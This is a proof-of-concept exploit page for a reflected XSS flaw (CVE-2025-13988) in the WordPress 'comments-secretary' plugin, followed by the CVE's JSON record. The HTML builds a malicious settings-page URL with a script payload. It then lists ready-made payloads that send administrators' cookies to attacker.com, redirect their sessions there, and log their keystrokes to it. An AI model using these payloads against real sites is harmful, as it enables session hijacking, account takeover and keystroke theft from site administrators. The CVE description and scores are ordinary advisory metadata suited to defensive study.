CVE-2025-13988

<!-- CVE-2025-13988 PoC: Reflected XSS in WordPress comments-secretary plugin --> <!-- Target: WordPress site with comments-secretary plugin <= 1.3.2 --> <!-- Attack Vector: Malicious URL via $_SERVER['PHP_SELF'] --> <!-- Step 1: Craft the malicious URL --> <!-- Replace 'http://target-site.com' with the actual WordPress site URL --> <!DOCTYPE html> <html> <head> <title>CVE-2025-13988 PoC</title> </head> <body> <h1>CVE-2025-13988 Reflected XSS PoC</h1> <p>Target: WordPress with comments-secretary plugin <= 1.3.2</p> <script> // Malicious URL that triggers the XSS // The payload: /wp-admin/options-general.php/"><script>alert('XSS')</script> const targetUrl = 'http://target-site.com/wp-admin/options-general.php/'; const xssPayload = '"><script>alert(document.cookie)</script>'; // Generate the full malicious URL const maliciousUrl = targetUrl + xssPayload; // Display the PoC URL document.getElementById('poc-url').innerHTML = '<a href="' + maliciousUrl + '" target="_blank">' + maliciousUrl + '</a>'; // Log for debugging console.log('Malicious URL:', maliciousUrl); // Function to demonstrate cookie theft (for educational purposes only) function demonstrateCookieTheft() { const cookies = document.cookie; console.log('Cookies would be stolen:', cookies); return cookies; } </script> <p>Malicious URL:</p> <div id="poc-url" style="background-color: #f0f0f0; padding: 10px; word-break: break-all;"></div> <p><strong>Attack Scenario:</strong></p> <ol> <li>Attacker creates a malicious URL with XSS payload</li> <li>Attacker tricks a logged-in WordPress admin into clicking the link</li> <li>Admin visits the URL, triggering the XSS</li> <li>Attacker's JavaScript executes in admin's browser</li> <li>Attacker can steal session cookies or perform actions as admin</li> </ol> <!-- Alternative payload for more advanced attacks --> <h2>Advanced Payload Examples</h2> <pre> <!-- Cookie stealing payload --> /"><script>fetch('https://attacker.com/steal?c='+document.cookie)</script> <!-- Session hijacking payload --> /"><script>document.location='https://attacker.com/hijack?cookie='+document.cookie</script> <!-- Keylogger payload --> /"><script>document.onkeypress=function(e){new Image().src='https://attacker.com/log?k='+e.key}</script> </pre> </body> </html>

{"cve": {"id": "CVE-2025-13988", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:45.697", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The 评论小秘书 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.3.2. This is due to insufficient input sanitization and output escaping on the `$_SERVER['PHP_SELF']` variable in the plugin's settings page. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/comments-secretary/tags/1.3.2/tho_fetion.php#L173", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/comments-secretary/trunk/tho_fetion.php#L173", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b24506c2-bf5e-4c71-94a5-c557a09f9f0d?source=cve", "source": "[email protected]"}]}}